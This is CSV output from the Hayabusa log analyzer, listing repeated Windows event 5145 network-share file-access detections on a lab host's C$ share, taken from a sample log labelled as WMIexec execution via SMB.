2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
